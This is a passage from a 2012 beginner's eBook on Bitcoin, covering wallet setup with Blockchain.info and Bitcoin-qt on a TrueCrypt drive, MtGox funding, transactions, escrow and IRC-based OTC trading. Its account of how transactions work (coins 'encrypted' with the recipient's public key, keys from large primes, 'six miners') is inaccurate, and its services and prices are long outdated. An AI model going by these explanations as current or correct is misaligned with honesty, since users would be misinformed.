MIT license and +originally created by Satoshi Nakamoto. +Bitcoin is one of the first implementations of a concept called crypto-currency which was first +described in 1998 by Wei Dai on the cypherpunks mailing list. Building upon the notion that +money is any object, or any sort of record, accepted as payment for goods and services and +repayment of debts in a given country or socio-economic context, Bitcoin is designed around +the idea of using cryptography to control the creation and transfer of money, rather than +relying on central authorities.” (anonymous, 2012) +Let’s define a few terms. +Bitcoin: a unit of measure for the currency traded, which can be sent over the internet +Block: used to record the ownership of the BTC within the network +Hash: used in the cryptographic process +Market Value: the total number of BTC times the current exchange rate in the government +backed currency +Mining: The process of finding cryptographic hashes that can be used to keep the network +running or to find new blocks of 50 BTC which enter circulation after found +The current number of blocks is 199,446. There are 9,972,350 BTC and the USD Exchange rate is +$12.10 / BTC. So, the total market capitalization is $120,665,435 USD. In simple terms, if I had +$121 Million USD, I could buy all the BTC in existence if everyone sold them to me at the +current rate. +As I will explain in the chapters that follow, the exchange rate is determined by supply and +demand. What you should take away now is that the number of BTC is not fixed at this time +but growing. In the future it will become fixed. + +The number of BTC grows slowly over time and will reach a maximum number at 21 million at +which time there will be no more BTC created. The only method through which new BTC can +enter into the market is through BTC Mining operations. This is where users buy specialized +computer equipment which can be used to process the work required to find the unique +hashes that are used for the network. The miners keep the network alive. The hardware they +use is what keeps the network traffic flowing. Without it moving, a transaction would not +occur. The miners must buy the equipment and pay for the electricity to run it. In exchange, +they stand a chance of finding new 50 BTC Blocks, known as a reward. The reward will reduce +to 25 BTC sometime around 12/1/2012. Once a miner finds the reward it becomes theirs. +Some miners mine in pools that share in the finds over time. +If you are the sort of reader that is strong in math and are looking for a really good source of +information about how the Bitcoin infrastructure works, here is a good link to the Bitcoin wiki: +https://en.bitcoin.it/wiki/Difficulty +The eBook, which can be found for $0.99 on Amazon, describes the math in great detail. +Bitcoin: A Peer-to-Peer Electronic Cash System [Illustrated] +http://www.amazon.com/Bitcoin-Peer---Peer-Illustrated-ebook/dp/B00538IVFK/ref=sr_1_1? +ie=UTF8&qid=1348453217&sr=8-1&keywords=Bitcoin%3A+A+Peer-to- +Peer+Electronic+Cash+System + +Bitcoin Storage +As a user of the Bitcoin network, you will eventually own your own BTC. You’ll need +somewhere to put them. The most logical place is a wallet. As it would happen, this is exactly +where you would put them, into an electronic wallet. The wallet can reside locally on your +computer, on a USB Stick or online in one of the many online wallet sites. +As a professional security practitioner, I feel the need to make the following statement with +regards to all implications of security referenced in this eBook: +Note: All claims to security in this book cannot take into account all threat vectors, namely +you. If you allow an attacker to infiltrate your computer with a Trojan that has a back door +and key logger, they will likely end up with your wallet. +There are many unforeseen attack surfaces. I will attempt to document some good practices. I +also cannot speak to the level of security actually provided on the secure online wallets. +Recently an exchange was infiltrated and approximately $250,000 USD worth of BTC was +stolen (Kirk, 2012). +My goal is not to scare would-be users away, but I do want to instill in them a fair sense of +security. I can say that I use the Bitcoin network and feel safe in using it. + +Trading BTC +Let us start with how BTC is exchanged. In simple terms, the process of sending BTC from one +user to another is based on asymmetric cryptography. This means that if Alice wants to send +Bob 12.5 BTC, the following would have to occur: +1. Bob uses the wallet application to create an address, which is represented by the +software as a long string of alphanumeric characters. +2. Bob gives Alice the address which is the public key for which Bob has a matching +private key in his wallet. +3. Alice uses her Bitcoin application to send 12.5 BTC to Bob using the provided address. +4. The transaction is made public on the network and miners begin to process it. +5. Once the transaction has gone through enough cycles on the network, it is released to +Bob. +The 12.5 BTC are now no longer Alice’s. The 12.5 BTC now belong to Bob. The information that +proves Bob’s ownership exists in the database of blocks which is stored on your local PC by the +wallet application or on the online wallet service if you choose an online wallet. The proof of +ownership for Bob is that private key which is stored in his wallet. The fact that everyone in +the network has the same information protects Bob’s right to ownership as long as he retains +the secret keys. He could give someone his wallet, or it could be stolen from him and the +bearer would have the ability to take the BTC and transfer them to another account. + +Online Wallets +The choice to use an online wallet is one which should be weighed heavily. I would like to +quote something from the wiki which I believe is very important: +“When bitcoins are stored online, the provider retains full control of those amounts. You are +trusting a third party to maintain your Bitcoin balance on your behalf. In comparison, if you run +the Bitcoin software yourself, you are in full control of your coins so long as the wallet file +stored on your computer is kept secret and secure.” (Anonymous, Browser-based wallet, 2012) +A list of eWallets can be found here: https://en.bitcoin.it/wiki/Category:EWallets +A newer breed of eWallet called Hybrid eWallet can be found here: +https://en.bitcoin.it/wiki/Category:HybridEWallets +A Good place to start when creating an online wallet is Blockchain: +https://blockchain.info/ + +Step 1: Create a New Wallet +Their online wallet can be found at: +https://blockchain.info/wallet/ +Select “Start A New Wallet”. + +Step 2: Create Password +Create your password, and confirm it. Select a complex password. Use the following rule: +· At least one capital letter +· At least one lowercase letter +· At least one number +· At least one symbol ~!@#$%^&*()_+=-[]\{}|;’:”,./?>< +· Make the password at least 24 characters in length +Following these steps will make it near impossible for an attacker to crack the password and +gain access to your account. +Next: WRITE DOWN THE PASSWORD, and keep it safe. +Enter the Captcha. +Press the “Continue” button. + +Step 3: Make Note of the Wallet URL +I blocked out my address since I do not want to provide extra information to an attacker. Copy +the entire URL from https:// through to the end of that line. +You can optionally add an email address and nickname. +Then press “Proceed To Login”. + +Step 4: Login to Online Wallet +Again, I covered up my address. You’ll notice that the address in the Address Bar of your +browser is the one previously noted. +Enter your password which you created in Step 2. +Press “Open Wallet”. +From here you can: +· Fund your wallet +· Withdraw funds +· Modify your account settings +· Back up your wallet +· Send money +· Receive money +· View your transactions +· View account balances +You’ll notice an address above the twitter bird. This is the address that others will use when + +sending you BTC. +Until you have become very familiar with the BTC environment and your wallet, you should +consider not playing with the import/export functionality. +In the remainder of the book, I will demonstrate various tasks: +· Funding your wallet +· Sending BTC +· Receiving BTC +· Viewing transactions +If you have an iPhone, there is an application (of course) that will allow you to perform some +basic functions with your wallet. For instance you can view your balance, send and receive BTC. +Here is an address for more information on it: +https://blockchain.info/wallet/iphone-app +The previous article indicated that you could not download from the App Store. Apparently +this has been resolved, because I have downloaded it from the App Store and it works just +fine. Additionally, your other options are to load it on a jail broken phone. I highly discourage +this since any jail broken phone can easily be compromised by an attacker and render your +account vulnerable. If you have a way to build the app, you can download the source code, +compile it and load it on your phone. You will need a Mac and a number of tools to do this. I +have on occasion done this in the past. It is not for the faint of heart. If like me, you are a +software developer and happen to have this environment already, this might be an option. +Android is not left out either. There is an app on the Android Market. I have not reviewed this +app, but it does exist. Here is the address for more information: +https://blockchain.info/wallet/android-app + +Step 5: Verify Your Email +You will receive an email shortly after setting up your account. When you receive the email: +· Log into your account if you are not already logged in. +· From the home screen, press the “Account Settings” button on the right-hand side of +the screen. +· You will be taken to a screen which has a small menu on the left-hand side. +· The General menu will be selected by default. +· Enter the code provided in the email and press the “Verify” button. + +Step 6: Optional Security Features +If you decide to use an online wallet, consider some of the additional precautions available +such as: +· Double encrypting your wallet - This will use the password previously generated to +authenticate you. The second password will be used to make transactions. +· Use multi-factor authentication +· Payment notifications +Step 6A: Double Encryption +From the main URL: +https://blockchain.info/wallet/ +Select “2 Double Encryption”. +Enter a password using the previously mentioned standard and write it down. +Step 6B: Multi-Factor Authentication +Multi-Factor Authentication (MFA) allows you to increase the security of your account. A +password helps keep your account safe because it allows you to keep something that you know +privately and present it to the service. Only someone that knows this piece of information can +gain access to your account. MFA allows you to add something that you have. One such +solution is the YubiKey which is a small USB device that plugs into your computer and acts like +a keyboard. When you press the button on the YubiKey, it types a One Time Password (OTP). +(This combined with your password that you know means that only if someone has both can +they access your account.) This means that someone can only access your account if they have +both the OTP and your password that only you know. +To configure your online wallet to use MFA, log in to the wallet. +Select the “Account Settings” button on the right-hand side of the screen. +Select the “Security” option in the menu on the left-hand side of this screen. + +One option is to use a Yubikey. Yubikeys are a small USB device that stores cryptographic string +hashes and are synced to a server. You can find more information here: +http://www.yubico.com/yubikey +Using multi-factor authentication means that if an attacker does get your password, they will +also need the USB key in order to gain access to your account. This follows the rule of +something you know, your password, and something you have, your Yubikey. If you do choose +to use an online wallet, I strongly suggest you invest in a $25 Yubikey. +Step 6C: Email Notifications +From the Account Settings screen, select the “Notification” menu option. +The options on this screen are fairly straight forward. You can have the wallet notify you via a +number of different methods and for a couple of different reasons. The simplest is to select +email. +To set up SMS Notifications, select the “SMS Notifications” checkbox. You will be prompted +with a list box of country codes. Select the one that fits where your phone service resides. +Then enter your phone number. In the U.S., make sure to enter your area code. Then press +“Enter” on your keyboard. +NOTE: I entered dashes the first time and the message didn’t come through. After waiting +about 15 minutes, I returned to the page and took the dashes from 555-555-1212 and made +the number 5555551212. Then, I hit enter again, and the SMS message arrived within 10 +seconds. +When the confirmation code arrives, enter it, and then Press “Verify”. +Important Note for Online Wallet User +I will use the personal wallet to demonstrate much of the functionality around sending, +receiving BTC, as well as funding your account. While the steps will differ, the functionality can +be translated to how you would do it in the online wallet. The next section describes how to +create your personal wallet. + +Personal Wallets +I will walk you through the process of installing and setting up your wallet on your local +computer. The basic setup will install a wallet.dat and blocks database on your local +computer. I will show you how you can secure this by moving it onto a secure drive using +TrueCrypt, an open source tool for creating secure drive volumes. I will walk you step by step +through the process. This will allow you to either store the wallet on a secure drive on your +computer’s hard drive or place it on a USB memory stick which you can secure in a fire safe or +other safe location. +Remember that if you lose the wallet, you have lost your money, so we will also see ways to +back this up. If all of this seems too much for you, then stick with the online wallet. +Step 1: Install the Bitcoin Wallet Software +Download the software from the wiki: +https://en.bitcoin.it/wiki/Main_Page +Depending on your operating system, download the correct one for you. +The wiki also has a set of screen shots to walk you through the set up: +https://en.bitcoin.it/wiki/Getting_started_installing_bitcoin-qt +There is even a link to get some free BTC (even if it is just a fraction of a BTC). +Step 2: Synchronize the Blocks +Once you have the software installed, you will notice that it begins a process of synchronizing +the blocks. This can take about 24 hours to complete and will transfer 2 to 4 GB of data to your +computer. It is an important step, and you will have to let it complete before you continue +performing other steps. +I recommend that you continue to read and come back to this step once it is complete. You +can continue with Steps 3 & 4 while you wait. +Once the initial blocks are installed, then you can continue with Step 5. +Step 3: Install TrueCrypt +There are a number of applications that can be used for this step. I chose TrueCrypt because +it’s open source, which means it’s free to use. It is also fast and reliable. The fact that it is +open source means that the code has been and can be reviewed by anyone which makes it +much more secure to use. +Download TrueCrypt from here: + +http://www.truecrypt.org/downloads +Once downloaded, install the application. +Select the defaults. +Step 4: Create Secure Drive +Once installed, open the application: +Select “Create Volume” and follow the wizard. +Select “Next”. +You will want to place the volume either on a hard drive or on a thumb drive where you can +create at least a 10 GB file. + +Select “Next”. +The size of the drive needs to be at least 10 GB. +Select “Next”. +This step is so very important. I cannot stress this enough. +Select a complex password. Use the following rule: +· At least one capital letter +· At least one lowercase letter +· At least one number +· At least one symbol ~!@#$%^&*()_+=-[]\{}|;’:”,./?>< +· Make the password at least 24 characters in length +Following these steps will make it nearly impossible for an attacker to crack the code and gain +access to the drive should they find it and download it. They will have to download the entire +10 GB file in order to try to crack it. +Next: WRITE DOWN THE PASSWORD, and keep it safe. If you build a small fortune in BTC in +your secure drive and then forget the password to it and you followed my recommendation, +you may be safe from attack, but you’re not going to get into it either. Those BTC will be lost. + +Select “Large Files”. +Select “Next”. +Select “Next”. +Then move the mouse around on this next screen and hit “Format”. +Step 5: Move Wallet and Blocks to Secure Drive +Do not continue with this step until the wallet application has finished synchronizing. +If the Wallet application is running, exit out of the application. +Open TrueCrypt and press “Select File”. Then, select the file we created in the above process. +Also select a free drive letter. You will want to use the same drive letter every time. +Now select “Mount”. + +Enter your password, and hit “OK”. +If everything worked as it should, now the secure drive should be mounted and looks like a +hard drive. +Now we need to identify where your Bitcoins Wallet file is. The reference for what’s in the data +directory and where you can find it is here: +https://en.bitcoin.it/wiki/Data_directory +Looking at that page, the location for Win7 is: +C:\Users\YourUserName\Appdata\Roaming\Bitcoin +With the Bitcoin wallet application closed, you want to copy the contents of this directory to +your new drive. First, make a directory in the new drive called Bitcoin. Now open that folder +and copy the files into it. +Step 6: Configure Your Wallet Application to Use the New Location +Once the files are copied over, we need to tell the app where the data files are. There is a +command line option that we need to set. To do this on Win7, right click on the desktop +shortcut and select “properties”. If there is no shortcut on your desktop, copy it from the Start +Menu to your desktop if you’d like, or edit the one in the Start Menu. That is up to you. You +will need to note which shortcut you edit. This is where you will need to launch it from in the +future. In the example below, I mounted my secure drive to Drive X, so the wallet.dat is located +in X:\bitcoin. +Notice the –datadir=x:\biticon +Add the parameters after the Bitcoin-qt.exe in the target. This is where you set the command +line option. It will differ for Linux and Mac operating systems. Press “OK”. +You’re done. + +Step 7: Reopen Wallet App +The process to open your wallet will always be the following: +1. Open TrueCrypt. +2. Mount the Encrypted Drive. +3. Open bitcoin-qt (your wallet application) using the shortcut with the modified target. +If you try to open bitcoin-qt without opening the encrypted drive first, it will not be able to +locate the wallet or blocks while the encrypted disk drive is mounted. +Each time you open your wallet you will notice that it needs to synchronize with the network. +Do not leave it open. You should only open your wallet when it is required. If you do have a +Trojan or other back door on your computer, your wallet.dat file is vulnerable to being copied +off your system. +There is more information on the wiki about securing your wallet: +https://en.bitcoin.it/wiki/Securing_your_wallet + +Bitcoin-qt +Once installed and all the blocks are updated, you will see the main overview screen. +The Overview Tab shows the current number of BTC you have and the most recent +transactions. +The Send Tab allows you to send BTC. I’ll demonstrate this in a later chapter. +The Receive Tab allows you to set up addresses that can be used to receive BTC. I’ll +demonstrate this in a later chapter. +The Transactions Tab will show you a history of the transactions for this wallet. +The Address Book allows you to enter addresses that you often send money to. +Export allows you to export your received addresses. + +Bitcoin Exchange +Spending Bitcoins is certainly a useful thing to be able to do. However, until it takes over as the +primary currency, (I’m not suggesting it will.) users will need to be able to move government +issued money in and out of the system. This is done through exchanges. Currently, there are a +number of exchanges that convert many different denominations to and from BTC. The price +of the exchange is set by you, the buyers and sellers, in an open market format. +Anyone can sell BTC for USD, EUR or other currency. You can place an order to sell at a preset +amount known as a limit order. When someone decides they need to buy BTC, they can +purchase at that price. Users can also decide that they would like to buy BTC at a preset price. +They can enter a limit order and wait until someone determines it’s fair and sells their BTC. +The exchanges charge a small fee. One such market MtGox, the largest such market, charges +2.5% per trade. +Limit orders are good when you have a lot of BTC that you want to receive a specific price for +and have the time to wait. If you just want to buy or sell BTC, you can place a market order. If +the transaction is small, under a thousand USD, it should hit near the current bid or ask price +depending on if you are buying or selling. If you plan to sell a lot fast, expect to drive the price +down. If you plan to buy a lot, expect to drive the price up. +At the time of this writing, the current market capitalization in USD is $120 Million. You can see +the current market details at: +http://bitcoincharts.com/bitcoin/ +You can see the Market Book, the list of sell orders and buy orders outstanding for a given +market, at: +MtGox : http://bitcoincharts.com/markets/mtgoxUSD_depth.html + +The number of BTC and the price they are being sold at or bought at is listed. There is a +calculator which can be used to determine how much a particular number BTC will cost and if +the order can be filled or not. This is useful if you want to obtain a specific price or if you will +be funding a Bitcoin purchase. You should plan the purchase. You may buy many coins and +drive up the price, then make a purchase shortly after at this elevated price. It is possible that +the price will drop significantly as someone else sells BTC at the bid price rather than your ask +purchase. +For example, based on the numbers in the chart shown above, let’s say you want to buy 742 +coins. The last sale price will be $12.24. You will have just raised the price of BTC from about +$12.10 to $12.24 USD. If someone else comes in and sells their BTC to someone based on the +bid, which would occur if they didn’t want to wait to sell, then the new price would be $12.08. +As you can see, there can be some volatility in the markets. +There are a number of different markets that you can trade BTC to government backed +currency and government backed currency to BTC. For a list of the markets, visit the All +Markets page at: +http://bitcoinwatch.com/ +or +http://bitcoincharts.com/markets/list/ +A graphical market index with all the current markets can be found at: +http://bitcoincharts.com/markets/ +The page provides Last Price, 30 day thumbnail, Average Price, Volume, Low and High, Bid and +Ask, 24 hr avg. and volume. + +Another list of markets can be found on the Bitcoin wiki: +https://en.bitcoin.it/wiki/Buying_bitcoins + +Funding Your Market Account +Given the large number of markets and the various ways to fund each of them, it is beyond the +scope of this eBook to describe every possible combination. I am currently a member of +MtGoxUSD, which is also the largest exchange. They claim, as of July 2011, to handle 80% of +the Bitcoin trade. See their home page for the reference: https://mtgox.com. From the current +numbers, it appears they do indeed have the largest share but not 80%. Demonstrating how to +fund on this market account is the best place to start since using it will provide you the best +liquidity. + +Step 1: Sign Up for An Account +https://mtgox.com/signup +Once you are signed up, you’ll be asked to go through a verification process. You should +consider doing this. However, if you will not be moving more than $1,000 USD / day and +$10,000 USD /month, you do not need to be verified. + +Step 2: Fund Your Account +From the Home Page, Select “Funding Options”. +To get money into the account, you can do a bank transfer, which is best for large amounts. If +you have cash and want to get it into the system fast, the following is one way to do it. +Step 2A: A Cash Deposit through BitInstant +Select “Cash Deposit via BitInstant”. +You can enter an amount and it will tell you the fees. For instance $500 will be $23.45, so +$476.55 will be deposited. +Then select the “Add Funds”. +You will be prompted if it is valid to send. There is an upper limit on deposit through this +method. +TrustCash will use your addresses provided to MtGox to determine the nearest locations where +you can deposit the funds. Select a bank location and fill in the information. You will be given +a receipt to take to that bank location. +The handling fee that I’m seeing is $1.26, which might be different if you use a different bank +than I selected, so the total fee to deposit this money is +· 4.49% + $1 = $23 +· $1.26 at the bank +That comes to about 4.9% overall. That is not too bad, but you will lose money in the process +of trying to fund the account. + +Step 2B: Alternative BitInstant – BitInstant Site Directly +Before going to the BitInstant site, it is important to note your account number from MtGox. It +can be found at the top of the web page in the center. It will say “Account Number” next to it. +You will need that number to ensure you will receive the money. +Go to the site: https://www.bitinstant.com/ +Select “MoneyGram” in the Pay From drop down menu and “MtGox” in the Pay To drop down +menu. You can experiment with other options. Look to see if there are CVS or 7/11 stores that +support transactions in your area. Near me, only MoneyGrams are supported. I can go to Wal- +Mart and have it funded. +In the account box, place your MtGox account number. +Enter the amount to send and notification email. +When you do, you will be taken through a series of screens where you will verify additional +information. I cannot finish the process to get the screen shots. If I do, I will have an +outstanding money order. So there are no screen shots for this. When you do this, you will +end up at a ZipZap site where you can enter your phone number and search for a location to +send the MoneyGram. +Once you’re done entering your information, select “Create Payment Slip” at the bottom of the +screen. +Print this out and take it to the location you chose. I’ll continue with the example assuming +you picked Wal-Mart. At Wal-Mart, there is a Money Center generally in the front of the store. +Go there, grab a blue MoneyGram form and fill in the information. The slip you printed out +will have the information you need to properly fill it out. +Pay the clerk the money. Drive, walk, take a cab, bus or train home. Within 30 to 60 minutes, +your MtGox account will be funded. +The fees on this are a little bit less: + +· 3.99% = $19.94 on $500 +· $3.95 MoneyGram +Total Percentage is 4.78%, which is a little less than if you fund it directly from MtGox. + +Step 3: Buying Bitcoins +If you recall from the Exchange section, you can place a market order to tell the system how +much USD you want to spend, and you’ll spend that much money and receive the number of +BTC based on current BTC for sale. Alternatively, you can enter a limit order and set the price +at which you want to buy the BTC. With a limit order, you will need to wait until someone in +the marketplace decides they want to sell at the price you are asking. +To enter a limit order: +· Enter the number BTC to buy. +· Enter the price to pay. +· Select the “Buy Bitcoins” button. +Your open order will be displayed in the bottom section of the screen. If you simply want to +place a market order, check the “market order” check box. Enter the number of BTC you wish +to buy, and you will be told approximately how much it will cost. +You can do the same for Selling Bitcoins. + +Step 4: Sending the Bitcoins to Your Wallet +From the Trade window: +· Select “Funding Option”. +· Then, select the “Withdraw Funds” tab. +· Enter the number of BTC to transfer. +· Enter an address from your wallet. (See the section in a later chapter about creating an +address for others to send to you. You will use one of these addresses.) +· Select the Open transaction. +It is optional to pay the transaction fee on small transfers. The transaction fee helps pay the +miners. This is another way to help fund the infrastructure. If you consider adding 0.005 BTC +at $12USD/BTC, it works out to about $0.06. It is worth considering. It will speed up your +transaction. If you don’t, it will still go through but could take longer. The fee will provide an +incentive for the miners to continue to mine. +· Press “Confirm”. +Now check your wallet. Eventually you will see the money there. It does tend to move quickly. + +Extracting Funds to Government Backed Currency +There are a number of ways to convert your BTC back to a government currency like the US +Dollar. MtGox is planning to release their MasterCard Debit card which will allow you to +maintain USD balance in your account and spend it directly using the debit/MC. This means +that you will not need to transfer the funds to your bank first. It is due to be released at any +time. Since we have already discussed using this market, when debit becomes available it +would be something worthwhile to look into. It is supposed to tie your USD or other currency +to the debit card which will work like a MasterCard. There really is not much to say about this +since it has not yet been released. +MtGox allows you to perform a bank wire to your bank. This will allow you to extract larger +sums of money directly to your bank. This is good for larger amounts since there is a $25 +service charge involved. + +Step 1: Where to Go +To get to withdraw the options, on the MtGox site: +· Go to “Home” in the main tool bar. +· Then select the option for “Funding options”. +· OR URL: https://mtgox.com/trade/funding-options +· Then select “Withdraw Funds”. +· Select the “Available Withdraw Methods” drop down to select one of the many +methods. + +Step 2: How to Add Other Options +· Press the “Add Withdraw Method”. +· Select the “Bank Transfer” +Select one of the methods that suit your needs. + +Step 3: Add money to PayPal +There are a couple of methods to do this. I will walk you through the one I found to be the +easiest. The fees are a little higher. +Step 3A: BTCPak +Go to https://www.btcpak.com/ +This is going to allow you to convert BTC to MoneyPak which can be used like cash to fund your +PayPal card or pre-paid debit cards. +You will also need to add an address for refunds to be sent to in the event a refund is +required. This is rare but if for some reason a refund is made and there is no address, the BTC +will be lost. You should use an address that exists in your wallet, so you end up with the +money in the event of a refund. +Without BTC to move out, I cannot show more steps. +You’ll notice that the funding of the MP takes about one hour. The one hour is the time that it +takes for six confirmations of the transaction to occur. If you send money from MtGox and Use +a Green Address, it will create the MoneyPak instantly. + +Bitcoin Transactions +Now that you understand what a Bitcoin is, how to store them, what gives them value and how +to fund your account, let us talk about how to send and receive them. When you use a wallet +to store your BTC, you know that it actually stores a key, which proves your ownership. This +key is actually a pair. There is a public key and a private key. The public key is known as an +address. This address can be used to send BTC from one user to another. BTC are traded using +Public Key Cryptography. +A full description of Public Key Cryptography is beyond the scope of eBook. I will give you a +simple explanation. For a complete explanation checkout: +http://en.wikipedia.org/wiki/Public-key_cryptography. +Two very large prime numbers are found that when used can both unlock a message if the +message is encrypted with one of them. One of the numbers becomes the public key and the +other becomes the secret key. Encrypting with one key allows the message to be decrypted +only by the corresponding number (key). We can then provide our public key, and when +someone uses it to send (encrypt) BTC to us, we are the only ones with our secret key that can +receive (decrypt) it. +Let us say we have Alice and Bob who want to exchange BTC. Both have a key pair. +1. Alice uses Bob’s public key to send the money. +2. The BTC is encrypted with Bob’s public key. +3. The Transaction is signed by many of the miners using the hashes they are finding. This +builds the trust in the network. +4. Bob can then open the transaction with Bob’s private key. + +Receiving BTC +To receive the BTC, open your wallet. We will demonstrate here with Bitcoin-qt. Use the +procedures previously noted to open your wallet. Once open, if it has shut down for a while, +you will notice it is out of sync. +Give it a little time and it will begin to sync. +The syncing is the application going out and getting the most current blocks. These blocks tell +the application who owns what. It only knows based on the signed blocks. Either a local +private key in the wallet can decipher the block and prove ownership, or it cannot. These are +the only two options. +So, if someone sends you BTC and your wallet is not in sync, you may not see the transaction +come through. Once all the blocks are in sync, you will be able to see it. + +Once you can see the green check mark in the lower right-hand corner, the wallet is synced. +In order to have someone send you BTC, you will need to create an address for them. Click on +the “Receive Coins” button: +Create a new address. Press the button in the lower left side of the screen, “New Address”. +Give it a name. I like using the convention Year-Month-Day name. This allows me to know how +old the address is. +Click “OK”, and the address will show up in the receive window. +To get the address so that you can provide it to others, right click on the address and select +“Copy Address”. + +Address to send to: 13QPmiJymZpuv2q2rhdgXWokdybit8cFZC +Now we can provide that address to another person to send us BTC. +When a new transaction comes in, you will see a message in the lower right-hand corner (on +windows). +If you switch to the Overview Tab, you can also see the transaction: +Notice that you see an unconfirmed amount and that there is still a zero balance. The +transaction needs to be processed. Trust needs to be built around this transaction. Once that +occurs, you can spend the BTC. When we cover sending BTC, you will see there is an option to +pay a transaction fee in order to speed up the handling of the transaction. +If you go to the Transaction Tab, you can see the transaction. + +Double click on the transaction to see the details. +About nine minutes later, the transaction received its first confirmation. +Switching to the Overview Tab, we can see that the BTC is now confirmed and is in your +balance: + +Sending BTC +In order to send BTC, you first need an address to send to. For this demonstration, we will use +the eBook Demonstration in my other wallet: +1P9scjVao6n9t9ihNUBGXiCSHYAghzhzY7 +Please feel free to send BTC to any of the addresses listed in this book. J Donations are +welcome even if it is only 0.01 or less. +To send, click on the “Send Coins” button. +Then enter the address and a label to help you remember why you sent me the BTC. +When the confirm message appears, click “Yes”. +If you do not have enough to fund the transaction, you will see something like the message +below. In this case, the wallet was adding a transaction fee automatically. There were not +enough funds to cover the amount to send and the transaction fee. + +You have the option to set a transaction fee. The transaction fee encourages the miners to +process your transaction faster. The default is the amount shown in the window above. Think +of the transaction fee as a tip for good service. When all the Bitcoin blocks are found, it will be +the transaction fees that keep the network going. At the present time, you are not required to +submit a transaction fee on small transfers. However, it is highly recommended that you get in +the habit of adding one. At the present time with BTC around $12, 0.005, BTC is equal to six +cents USD. This is nothing if you are sending $100 USD or 8.5 BTC or more. If you are only +sending 1.5 BTC as we are, consider giving 0.001. We will adjust the transaction fee to 0.005 for +this example. +Click on “Settings” in the toolbar. +Then select “Options”. +Use the arrow keys to move the value by 0.001 up or down to zero. Then click “Apply”. +Now let’s enter a new value to send. + +This time it will go through and clear out our balance. + +Confirmed Transactions +It takes six miners to process the transaction before it is considered fully confirmed. We were +able to resend the BTC before it was fully confirmed but not until it was confirmed at least +once. About 30 minutes after it was initially sent, it was still not fully confirmed: +After six confirmations, it is considered fully confirmed. The network will continue to confirm +the transactions. To view this, send my address 0.01 (Okay; you can use any address.) and +watch the confirmations build over the days and weeks. I have a transaction that is a few days +old and it has 500 confirmations. The chain of confirmation will continue to grow. +It took 41 minutes for the transaction to reach the six confirmations. + +Other Transaction Types +Escrow +You might be asking yourself, if this marketplace is built on trust and non-revocable +transactions, then how can I do business with someone I do not trust? In some cases, trust will +have to be implicit with the fact that they are doing business in the marketplace and they +would not last if there was not trust. For instance, the market with high volume makes more +money by operating ethically than if they were to steal from any one person. +This is not the case with individuals. If someone is promising you something for BTC and you +do not know who they are, then suggest using an escrow service. These are services that exist +in order to broker trust between two untrusted parties. +Let us have Alice and Bob perform an escrowed transaction. The escrow service facilitates the +exchange for a fee. Let us trade something simple that seems to be a common untrusted +exchange. Alice finds Bob, and Alice wants to buy 50 BTC from Bob for $600 USD. You might +ask, “Why not just use the exchange?” As we noted in the previous sections, there are a lot of +middlemen in the process who all take a transaction fee. These fees can mount. The buyer +and seller will need to do their own math to determine if an over-the-counter transaction is +one worth their effort. +Bob will sign into an escrow site and set up a transaction and send the 50 BTC. Once the coins +are confirmed, then Alice will need to pay for the coins. She doesn’t have possession of them, +but neither does Bob. The escrow service has them. Once Alice pays Bob and provides a +method to verify the transaction has occurred, the escrow service will release the 50 BTC minus +the transaction fee. The ability to verify might be a PayPal transaction number that can be +viewed by both parties or some other agreed upon verification method. If the exchange is +goods, then the buyer may have an inspection time. Once the inspection time expires, then the +payment is made. These transactions are generally slow, so users beware. However, they are a +lot safer than the alternative. There are many scammers out there. +A list of escrow services can be found here: +https://en.bitcoin.it/wiki/Bitcoin_Escrow_Service +There is more about secure trading here: +https://en.bitcoin.it/wiki/Secure_Trading + +Over the Counter +Over-the-counter(OTC) trades are another way to trade BTC for government backed currency. +This system allows you to buy and sell BTC. To interact with the OTC, you will need to +download and install an Internet Relay Chat client. I will go over how to do this on Windows, +but there are clients for Mac and Linux as well. +You can use any IRC Client you want, but I will demonstrate the use of mIRC which costs $20. +You can download it from here: Http://www.mirc.com/get.html . There was a time when there +were free IRC clients. If you have access to one, feel free to use it. The commands I will be +demonstrating will work in any IRC Client. +Once you have it downloaded, go ahead and install it. Just accept all of the defaults. Once it is +installed, we need to set up your IRC Account. IRC will allow you to log in and interact +unverified. I highly recommend that you log in and create an account with a password. I will +review how to do this. +Double click on the icon on your desktop for mIRC: +You can use the tool for free for 30 days, or if you’d like and want to use it longer, you can +register it for about $20. Since there is a free 30 day trial, you can use it in order to follow my +instructions to create your IRC User (which is different than registering the IRC Client). You can +always find a different free one, or register this one at a later time. I am not affiliated with +mIRC, but I do have a registered copy. +When the application comes up, it will ask you to enter your Nickname, also known as a nick. +This is a unique name that you want to use in the channels. The channels are the community +message areas where chat can occur. I’ll explain that more once we are registered. +Then select the “Servers” item and change to Freenode > Random Server. + +Click, “OK” and then hit the “Connect” button (looks like a lightning bolt) in the upper right- +hand corner of the screen. +You will see a screen that looks like this: +The arrow points to the Command window. The commands that you will need to type in will +need to be typed in here. +Once connected, enter: +/msg nickserv register +Use your own password and email address. Also note that your IP Address appeared. We will +fix this as well. Write down your password, and do not use a simple password, as it can be + +stolen. You do not want someone to take over this account if you are going to establish it with +the Bitcoin OTC marketplace. You will receive an email with a command to verify. You must do +this step before you can continue. +/msg NickServ VERIFY REGISTER +When you need to log in to IRC in the future, you will need to use the following command to +log in: +/nickserv identify +The token is replaced with your password. You will generally have about 30 +seconds to enter it. If you do not enter it fast enough, the IRC server will boot you thinking you +are not the nick owner. +As I mentioned before, the IRC is made up of channels. You first need to visit the help channel +and ask for a cloak. This will hide your IP Address from prying eyes. Hackers will be looking for +you. If you leave the IP visible to them, they will be able to launch an attack against you. If +they get your wallet, it’s game over for your money. So you need to protect yourself. +To join the help channel use the following command: +/join #help +In the new channel window, ask the admin for a cloak. Simply type: +Admin, can I get a cloak? +Without the cloak, your IP Address is visible to everyone. With the cloak, your IP Address is +hidden from other users. This way they cannot detect what computer you are on and try to +attack it. So now when you log back in, you will be auto cloaked. It is important that you +obtain a cloak before you begin to trade. All an attacker needs in order to attempt to attack +you is your IP Address. +To join the Bitcoin OTC, let’s join the correct channel. Use the command: +/join #bitcoin-otc +To authenticate with the service, you need to interact with the channel bot. The bot is a +computer application that is logged into the channel as a user. The bot here is named gribble. +So to start a private conversation with gribble, type: +/query grible +You will see a new channel appear. This is gribble. + +Let’s quickly try something with gribble before we authenticate. Enter the following command +and make sure to use the preceding semi-colons. That tells the bot you are entering a +command for it to consume. +;;ticker +You should see something like this: + Best bid: 12.1388, Best ask: 12.19988, Bid-ask spread: +0.06108, Last trade: 12.1388, 24 hour volume: 39840, 24 hour low: +11.6304, 24 hour high: 12.27 +Now switch over to your wallet and create a new receive address. We are going to use 